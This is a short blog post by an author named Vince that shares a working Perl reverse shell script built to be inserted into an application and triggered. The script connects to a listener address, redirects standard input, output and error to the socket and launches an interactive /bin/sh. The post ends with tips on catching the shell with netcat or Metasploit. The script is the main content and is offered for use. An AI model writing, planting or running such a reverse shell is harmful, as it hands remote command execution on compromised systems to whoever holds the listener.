Perl Reverse Shell Script

by Vince

There are quite a few reverse shell examples available to you on the Internet. You can also find a large collection under /usr/share/webshells on the Kali Linux distro. That said, the other day, I needed a small Perl script to insert into an application which I could trigger. A one-liner wouldn't work and the more elaborate examples also wouldn't work. I came up with the following from something I found in a search; hopefully you can put this to good use.


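#!/usr/bin/perl -w
use Socket;

# Address and port of the listener that will catch the shell
$i="192.168.1.50";
$p=443;

socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
    # Point stdin, stdout and stderr at the socket, then start the shell
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
};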


Change the IP address and port to reflect where you want to catch this shell. You can catch it with netcat or Metasploit. With Metasploit, I've found that regardless of which account I get with my shell, the command "sessions -u #" (to upgrade the shell to meterpreter) will not work.

I’ll post how to get around that in a few days.  :)